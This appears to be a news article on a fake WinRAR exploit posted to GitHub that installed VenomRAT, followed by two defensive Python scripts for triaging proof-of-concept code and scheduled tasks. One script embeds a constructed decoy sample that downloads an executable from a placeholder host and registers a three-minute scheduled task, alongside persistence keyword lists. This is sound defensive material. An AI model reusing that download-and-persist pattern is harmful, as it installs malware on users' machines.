This bold hacker misleads security researchers into downloading malware


If you are still using WinRAR and looking to investigate the vulnerabilities of this data compression software, be extremely careful. A cybercriminal is currently circulating fake proof-of-concept code for a security flaw in this program, which was once present on nearly every PC.


According to cybersecurity researchers at Unit 42, a GitHub user called Whalersplonk “reused old proof-of-concept (PoC) code to quickly create a false proof of concept and push careless computer security researchers to execute malicious code.” While the original PoC is supposed to demonstrate the CVE-2023-40477 flaw, which allows remote code execution through WinRAR, the code offered by the hacker is in fact a reworked copy of another proof of concept, written in Python.


According to Unit 42, the fake PoC purporting to exploit this WinRAR vulnerability was based on a publicly available script that exploited an SQL injection vulnerability in an application called GeoServer, tracked as CVE-2023-25157. If you are a cybersecurity researcher, or simply interested in the field, make sure you download the correct PoC when you go to GitHub.
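A PoC that claims to demonstrate one bug but quietly downloads a binary and registers it for persistence is exactly the pattern the article describes. The script below is an added example, not code from the article or from Unit 42: it statically triages a Python PoC with the `ast` module, without running it, and flags network use, remote downloads, process spawning, persistence markers such as `schtasks`, and dynamic `exec`/`eval`. The two embedded scripts (`FAKE_POC` and `BENIGN_POC`) are constructed samples, and the `placeholder.invalid` URL is a placeholder, not a real indicator.

```python
import ast

# Module roots whose presence means the script talks to the network at all.
NETWORK_MODULES = {"urllib", "requests", "socket", "http"}
# os.* / subprocess.* functions that start a new process.
SPAWN_FUNCS = {"system", "popen", "run", "call", "Popen", "check_output", "check_call", "startfile"}
# urllib.* / requests.* functions that fetch remote content.
DOWNLOAD_FUNCS = {"urlretrieve", "urlopen", "get", "post"}
# Substrings (lower-cased) in string literals that point at Windows persistence.
PERSISTENCE_MARKERS = ("schtasks", "reg add", "\\currentversion\\run", "powershell")
DYNAMIC_EXEC = {"exec", "eval"}


def _call_name(call):
    """Dotted callee name of an ast.Call ('subprocess.run'); '' if it is not a plain name."""
    parts, node = [], call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def triage_poc(source):
    """Statically triage a Python PoC. Returns (verdict, findings); nothing is executed."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
        for name in names:
            if name.split(".")[0] in NETWORK_MODULES:
                findings.append(("network", f"line {node.lineno}: imports {name}"))
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        root, last = name.split(".")[0], name.rsplit(".", 1)[-1]
        if last in DYNAMIC_EXEC and root == last:          # bare exec()/eval()
            findings.append(("dynamic_exec", f"line {node.lineno}: {name}()"))
        if root in {"os", "subprocess"} and last in SPAWN_FUNCS:
            findings.append(("process_spawn", f"line {node.lineno}: {name}()"))
        if root in {"urllib", "requests"} and last in DOWNLOAD_FUNCS:
            findings.append(("download", f"line {node.lineno}: {name}()"))
        # Scan every string literal passed to the call (e.g. the argv list of subprocess.run).
        for lit in ast.walk(node):
            if isinstance(lit, ast.Constant) and isinstance(lit.value, str):
                if any(m in lit.value.lower() for m in PERSISTENCE_MARKERS):
                    findings.append(("persistence", f"line {node.lineno}: literal {lit.value!r}"))
    findings = list(dict.fromkeys(findings))               # nested calls are visited twice; dedupe
    kinds = {kind for kind, _ in findings}
    # Talking to the network is normal for a PoC; fetching something and then spawning a
    # process or installing persistence is not.
    if kinds & {"network", "download"} and kinds & {"persistence", "process_spawn"}:
        verdict = "high"
    elif kinds & {"persistence", "process_spawn", "dynamic_exec"}:
        verdict = "medium"
    else:
        verdict = "low"
    return verdict, findings


# Constructed sample: a decoy "exploit" that really drops a stager and a 3-minute scheduled task.
FAKE_POC = '''
import sys, os, subprocess
import urllib.request

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"
STAGER = os.path.join(os.environ.get("TEMP", "."), "update.exe")

def exploit(target):
    print("[+] sending crafted archive to", target)

urllib.request.urlretrieve("http://placeholder.invalid/payload.exe", STAGER)  # placeholder URL
subprocess.run(["schtasks", "/create", "/tn", "Updater", "/tr", STAGER, "/sc", "minute", "/mo", "3", "/f"])
exploit(TARGET)
'''

# Constructed sample: a PoC that only sends an HTTP request to the target it is pointed at.
BENIGN_POC = '''
import argparse, requests

def check(url):
    r = requests.get(url + "/rest/about/version", timeout=5)
    return r.status_code == 200
'''

if __name__ == "__main__":
    for label, src in (("fake", FAKE_POC), ("benign", BENIGN_POC)):
        verdict, found = triage_poc(src)
        print(f"{label}: {verdict}")
        for kind, detail in found:
            print(f"  [{kind}] {detail}")
```

The verdict deliberately treats network access alone as low risk, because a genuine PoC for a remote bug has to talk to its target; what separates the fake from the real one is the download-then-persist combination. A script that builds its commands from concatenated or decoded strings, or imports `subprocess` under an alias, will slip past this check, so it is a first filter before reading the code, not a substitute for reading it.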

This hacker tricks security researchers into installing malware on their PCs

According to the researchers, users who fell victim to this attack have most likely installed malware called VenomRAT (RAT for Remote Access Trojan), and it is very possible that a hacker has taken control of their PC. Indeed, once the code is launched, “a script downloads the malware and creates a scheduled task which runs every three minutes”. VenomRAT records everything you type on the keyboard into a local file, the contents of which it sends to a remote server at regular intervals.
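A scheduled task that fires every three minutes and runs a binary out of a user-writable directory is a strong persistence signal, and Task Scheduler can export any task as XML (`schtasks /query /tn <name> /xml` or `Export-ScheduledTask` in PowerShell). The hunt below is an added example, not code from the article or from Unit 42: it parses such an export, converts the ISO 8601 repetition interval (`PT3M`, `P1DT2H`) to seconds, and flags tasks that combine a short interval with a command living under a user-writable path or invoking a script interpreter. The three task documents and the task names are constructed samples (real exports carry a UTF-16 XML declaration, omitted here so the strings parse directly).

```python
import re
import xml.etree.ElementTree as ET

# Default namespace used by Task Scheduler XML exports.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
MAX_INTERVAL_SECONDS = 5 * 60          # anything repeating this often deserves a look
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Subset of ISO 8601 durations that Task Scheduler emits: P[nD][T[nH][nM][nS]]
_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(text):
    """Convert a Task Scheduler duration such as 'PT3M' or 'P1DT2H' to seconds."""
    m = _DURATION.match(text.strip())
    if not m:
        raise ValueError(f"unsupported duration: {text!r}")
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def _basename(command):
    """Executable name from a <Command> value, tolerating quotes and either slash style."""
    return command.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_task_xml(task_name, xml_text):
    """Return a dict describing why (or whether) an exported task looks like persistence."""
    root = ET.fromstring(xml_text.strip())
    intervals = [iso_duration_seconds(e.text) for e in root.findall(".//t:Repetition/t:Interval", NS)]
    commands = [(e.text or "").strip() for e in root.findall(".//t:Actions/t:Exec/t:Command", NS)]
    min_interval = min(intervals) if intervals else None
    short_interval = min_interval is not None and min_interval <= MAX_INTERVAL_SECONDS
    reasons, bad_command = [], False
    if short_interval:
        reasons.append(f"repeats every {min_interval} s")
    for cmd in commands:
        if any(marker in cmd.lower() for marker in USER_WRITABLE):
            reasons.append(f"runs from user-writable path: {cmd}")
            bad_command = True
        elif _basename(cmd) in INTERPRETERS:
            reasons.append(f"runs a script interpreter: {cmd}")
            bad_command = True
    return {"task": task_name, "suspicious": short_interval and bad_command,
            "min_interval_s": min_interval, "commands": commands, "reasons": reasons}


# Constructed sample: the shape of task the article describes (3-minute repeat, binary in %TEMP%).
SUSPICIOUS_TASK = r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT3M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2023-09-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\alice\AppData\Local\Temp\update.exe</Command>
  </Exec></Actions>
</Task>"""

# Constructed sample: hourly vendor updater installed under Program Files.
BENIGN_TASK = r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT1H</Interval></Repetition>
    <StartBoundary>2023-09-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files\Vendor\updater.exe</Command><Arguments>/check</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample: logon-only PowerShell task, no repetition; noted but not flagged.
LOGON_TASK = r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-File C:\Scripts\mapdrives.ps1</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("Updater", SUSPICIOUS_TASK), ("VendorUpdate", BENIGN_TASK), ("MapDrives", LOGON_TASK)):
        result = triage_task_xml(name, xml)
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{name}: {flag} {'; '.join(result['reasons'])}")
```

The logon-only PowerShell task is reported but not flagged, which keeps the rule focused on the article's pattern (tight repetition plus an untrusted executable) rather than on interpreters in general. On a real host, feed every task exported from `C:\Windows\System32\Tasks` through `triage_task_xml` and review the flagged ones alongside who created them and when.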


Anyone who executed this fake PoC should therefore change their passwords for every site and environment on which they have an account.

Source: Unit 42
